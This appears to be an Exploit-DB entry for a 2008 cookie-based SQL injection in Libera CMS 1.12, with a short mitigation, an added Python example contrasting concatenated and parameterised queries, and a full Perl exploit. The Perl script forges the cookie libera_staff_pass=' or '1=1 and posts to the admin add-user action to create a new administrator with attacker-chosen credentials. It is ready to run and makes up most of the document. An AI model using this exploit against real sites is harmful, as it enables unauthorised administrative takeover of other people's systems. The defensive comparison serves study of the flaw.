vendor: Libera CMS
by: StAkeR
CVSS: 9.3 HIGH
CWE: 89 (SQL Injection)
Product Name: Libera CMS
Affected Version From: 1.12
Affected Version To: 1.12
Patch Exists: Yes
Related CWE: N/A
CPE: a:libera_cms:libera_cms:1.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit

This exploit allows an attacker to add a new admin with their own credentials by exploiting a SQL injection vulnerability in Libera CMS version 1.12. The exploit uses a cookie to inject malicious SQL code into the application. The attacker can then use the new admin credentials to gain access to the application.

Mitigation:

The application should be updated to the latest version of Libera CMS and input validation should be implemented to prevent malicious SQL code from being injected.
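
The following is an added example, not code from this entry or from Libera CMS: a Python/sqlite3 model of a staff check that trusts the libera_staff_pass cookie, shown next to a version that binds the cookie as a query parameter instead of relying on input filtering. The table, schema and function names are assumptions, as is the premise that the CMS concatenates the cookie into its query; the entry does not show the CMS source.

```python
import sqlite3

# Cookie value taken from the exploit listed on this page.
PAYLOAD = "' or '1=1"


def make_db():
    """Constructed in-memory staff table; the schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE staff (username TEXT, pass TEXT, su INTEGER)")
    db.execute("INSERT INTO staff VALUES ('admin', 'c0nstructed-hash', 1)")
    return db


def is_staff_vulnerable(db, cookies):
    """Assumed vulnerable pattern: the cookie is concatenated into the SQL text."""
    value = cookies.get("libera_staff_pass", "")
    sql = "SELECT username FROM staff WHERE pass = '" + value + "'"
    return db.execute(sql).fetchone() is not None


def is_staff_hardened(db, cookies):
    """Bound parameter: the cookie is compared as data and never parsed as SQL."""
    value = cookies.get("libera_staff_pass", "")
    if not value:
        return False  # a missing or empty cookie is never a valid session
    row = db.execute(
        "SELECT username FROM staff WHERE pass = ?", (value,)
    ).fetchone()
    return row is not None


def demo():
    """Return (vulnerable_result, hardened_result) for the forged cookie."""
    db = make_db()
    forged = {"libera_staff_pass": PAYLOAD}
    return is_staff_vulnerable(db, forged), is_staff_hardened(db, forged)


if __name__ == "__main__":
    print("forged cookie accepted (vulnerable, hardened):", demo())
```

With the forged cookie the concatenated query becomes `WHERE pass = '' or '1=1'`, which matches every row, while the bound version looks for a row whose pass column equals the literal payload string and finds none.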

Exploit-DB raw data:

#!/usr/bin/perl
 # ----------------------------------------------------------
 # Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit
 # Perl Exploit - Add a new admin with your credentials!
 # Author: StAkeR - StAkeR[at]hotmail[dot]it
 # ----------------------------------------------------------
 # Usage: perl http://localhost/cms StAkeR obscure
 # ----------------------------------------------------------

 use strict;
 use LWP::UserAgent;

 my ($hostname,$username,$password) = @ARGV;
 my $request  = undef;
 my $http_s   = new LWP::UserAgent or die $!;

 $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
 banner() unless $username and $password;

 $http_s->agent("Mozilla/4.5 [en] (Win95; U)");
 $http_s->timeout(1);
 $http_s->default_header('Cookie' => "libera_staff_pass=' or '1=1");           

 $request = $http_s->post($hostname."/admin.php?action=add_user_process",
                         [
                          username       => $username,
                          password       => $password,
                          password_again => $password,
                          email          => 0,
                          su             => 1,
                          submit         => "Add+User"
                        ]);
        
 if($request->is_success)
 {
   if($request->content =~ /added successfully/i)
   {
     print "[+] Exploit Done!\n";
     print "[+] Added New Administrator:\n\n";
     print "[+] Username: ${username}\n";
     print "[+] Password: ${password}\n";
   }
   else
   {
     print "[!] Exploit Failed!\n";
     print "[!] Site Not Vulnerable\n";
   }
 }


 sub banner
 {
   print "[+] Libera CMS <= 1.2 Remote SQL Injection Exploit (add new admin)\n";
   print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
   print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n";
   return exit;
 }

# milw0rm.com [2008-09-10]